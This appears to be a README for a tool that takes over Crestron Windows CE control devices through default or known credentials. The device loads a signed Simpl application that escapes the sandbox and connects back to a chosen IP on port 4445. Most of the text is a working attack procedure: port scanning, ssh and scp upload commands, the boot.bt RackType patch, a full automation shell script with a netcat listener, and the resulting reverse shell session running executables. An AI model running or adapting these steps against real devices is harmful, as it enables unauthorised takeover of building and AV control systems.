Tools for taking over Crestron Windows CE devices without the need for Crestron Toolbox.
If you have authenticated access, or the default crestron:<blank> credentials are still enabled, you can use the provided Simpl application to load a malicious application that breaks out of the sandbox and connects back to you.
In a perfect world, Crestron Simpl applications run in a sandbox and are signed with a special Crestron certificate that ships with Crestron Toolbox or the Simpl IDE. The application in this repository, however, is a signed Crestron application that breaks out of the Simpl sandbox on supported Crestron Windows CE devices. The expected target runtime is .NET Compact Framework 3.5.
Which ports are exposed depends on the device type and on whether you are looking at the control side or the LAN side. If only the LAN interface is connected, every service listens on that interface; otherwise the control ports listen on the control interface. The ports that matter here are 21 (FTP), 22 (SSH), 23 (telnet), 41794 (CIP) and 41795 (CTP console). Note that nmap's default top-1000 scan, as below, does not cover 41794 and 41795; add -p 41794,41795 to check them explicitly.
$ nmap 192.168.1.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:46 CDT
Nmap scan report for DMPS3-7f81812f.attlocal.net (192.168.1.174)
Host is up (0.0036s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
443/tcp open https
843/tcp open unknown
6510/tcp open mcer-port
This assumes you are starting from a clean slate. If you would like to factory reset the device to ensure nothing weird happens, SSH into the device and run RESTORE.
mkdir tmp
cd tmp
unzip ../pro3.lpz
ssh [email protected] del \\User\\*
scp * [email protected]:\\User
ssh [email protected] copy \\User\\boot.bt \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa_archive.zip \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.bin \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.cdm \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.rte \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpCustomAttributesInterface.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpData.dat \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpHelperInterface.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusLibrary.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusManagerApp.exe \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusObjects.dll \\Simpl\\App01\\
ssh [email protected] progregister -P:all
ssh [email protected] progreset
If you can telnet or SSH into the device, the console prompt shows the RackType that you need to put into boot.bt.
$ telnet 192.168.1.174
Trying 192.168.1.174...
Connected to 192.168.1.174.
Escape character is '^]'.
DMPS3-4K-150-C Console
Warning: Another console session is open
DMPS3-4K-150-C>
In boot.bt, the RackType is in the first stanza, [LG_BOOT_DATA], and by default is PRO3.
[LG_BOOT_DATA]
BinFileName=fdsa.bin
SMWFileName=fdsa.smw
NumberSymbols=15
NumberSignals=33
RouteFileName=fdsa.rte
CUZ=1.007.0017
RackType=PRO3 <---------- here
SymParamVersion=21.007.0017
NumberParameters=3
NumRealIntegralParams=0
NumRealStringParams=3
NVRAMUsed=0
[...snip...]
Replacing PRO3 with the device type from the console prompt (DMPS3-4K-150-C for the device above) ensures the device does not reject the application.
The shell expects a \User\ip file containing the IP address to connect back to. Port 4445 is hardcoded, so have a listener on that port ready before the program restarts.
$ echo -n 192.168.1.123 > ip
$ scp ip [email protected]:/User
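The whole procedure above (unpack the lpz, set RackType in boot.bt, write the ip file, clear \User, push the files, copy them into \Simpl\App01, register and restart) as one POSIX shell script. This is an added example and not part of the repository or its tooling; the variable names, the defaults crestron@192.168.1.174, ./pro3.lpz and ./stage, the RACK and CALLBACK inputs and the DRY_RUN switch are assumptions of this example. The file list is the same one the copy commands above use.

```shell
#!/bin/sh
# Added example, not part of the repository: the upload procedure from the
# README as one script. Everything configurable here is an assumption of
# this example, not something the original page defines:
#   TARGET    user@host of the device console (default crestron@192.168.1.174)
#   LPZ       the signed program archive (default ./pro3.lpz)
#   STAGE_DIR where the archive is unpacked and patched (default ./stage)
#   RACK      RackType to write into boot.bt, e.g. DMPS3-4K-150-C (required)
#   CALLBACK  IP address written to \User\ip for the connect-back (required)
#   DRY_RUN=1 print the ssh/scp commands instead of running them
set -eu

TARGET="${TARGET:-crestron@192.168.1.174}"
LPZ="${LPZ:-./pro3.lpz}"
STAGE_DIR="${STAGE_DIR:-./stage}"

# Files the README copies from \User into \Simpl\App01, in the same order.
APP_FILES="boot.bt fdsa_archive.zip fdsa.bin fdsa.cdm fdsa.dll fdsa.rte
SimplSharpCustomAttributesInterface.dll SimplSharpData.dat
SimplSharpHelperInterface.dll SplusLibrary.dll SplusManagerApp.exe
SplusObjects.dll"

# run CMD...: execute the command, or just print it when DRY_RUN=1
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# get_racktype FILE: print the RackType currently set in a boot.bt
get_racktype() {
    sed -n 's/^RackType=\([^[:space:]]*\).*/\1/p' "$1"
}

# set_racktype FILE RACK: rewrite only the value after RackType=. The value
# is matched up to the first whitespace, so the CR of a CRLF line ending
# (boot.bt comes from a Windows CE box) is left in place. RACK must not
# contain '/' or '&' (sed metacharacters); device types never do.
set_racktype() {
    sed "s/^\(RackType=\)[^[:space:]]*/\1$2/" "$1" > "$1.new" && mv "$1.new" "$1"
}

# stage LPZ DIR RACK CALLBACK: unpack the archive, patch boot.bt and write
# the ip file without a trailing newline (echo -n in the README).
stage() {
    lpz="$1"; dir="$2"; rack="$3"; cb="$4"
    mkdir -p "$dir"
    unzip -q -o "$lpz" -d "$dir"
    set_racktype "$dir/boot.bt" "$rack"
    printf '%s' "$cb" > "$dir/ip"
}

# deploy DIR TARGET: clear \User, push the staged files, copy the program
# into \Simpl\App01, register every program slot and restart the programs.
deploy() {
    dir="$1"; target="$2"
    run ssh "$target" 'del \User\*'
    for f in "$dir"/*; do
        run scp "$f" "$target:\\User"
    done
    for f in $APP_FILES; do
        run ssh "$target" "copy \\User\\$f \\Simpl\\App01\\"
    done
    run ssh "$target" progregister -P:all
    run ssh "$target" progreset
}

main() {
    rack="${RACK:?set RACK to the device type shown in the console prompt, e.g. DMPS3-4K-150-C}"
    cb="${CALLBACK:?set CALLBACK to the IP the device should connect back to}"
    stage "$LPZ" "$STAGE_DIR" "$rack" "$cb"
    deploy "$STAGE_DIR" "$TARGET"
    # port 4445 is hardcoded in the shell; wait for the connect-back
    run nc -l 4445
}

# sh deploy.sh deploy   (the functions above can also be sourced individually)
case "${1:-}" in
    deploy) main ;;
esac
```

Run it as RACK=DMPS3-4K-150-C CALLBACK=192.168.1.123 sh deploy.sh deploy; with DRY_RUN=1 it only prints the ssh and scp commands, which is the quickest way to check the paths before touching the device. The RackType edit deliberately stops at the first whitespace so the CRLF line endings of boot.bt survive the round trip.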
Once the connection is made, you can begin interacting outside of the sandbox.
$ nc -l 4445
Connected
> ls
\Network
\Windows
\Temp
\Program Files
\My Documents
\HTML
\Sys
\Simpl
\Nvram
\FTP
\User
\ROMDISK
\Application Data
\My Recent Documents
\Recycled
\SSHBanner
>
Compare this with the directory listing the sandboxed console gives for the same root:
$ telnet 192.168.1.174
Trying 192.168.1.174...
Connected to dmps3-7f81812f.attlocal.net.
Escape character is '^]'.
DMPS3-4K-150-C Console
Warning: Another console session is open
DMPS3-4K-150-C>dir
Directory of \
[DIR] 09-21-15 08:58:24 FTP
[DIR] 09-21-15 08:58:24 HTML
[DIR] 09-21-15 08:58:24 Nvram
[DIR] 09-21-15 08:58:26 ROMDISK
[DIR] 09-21-15 08:58:24 Simpl
[DIR] 09-21-15 09:05:26 SSHBanner
[DIR] 09-21-15 08:58:24 Sys
[DIR] 09-21-15 08:58:26 User
DMPS3-4K-150-C>
Available commands are ls, pwd, exec, cat, cd, and base64.
On a PRO3, for instance, you can run a graphics test executable that ships with the OS image to demonstrate the issue.
> exec \Windows\cube.exe
A spinning cube will replace the Crestron menu on the display.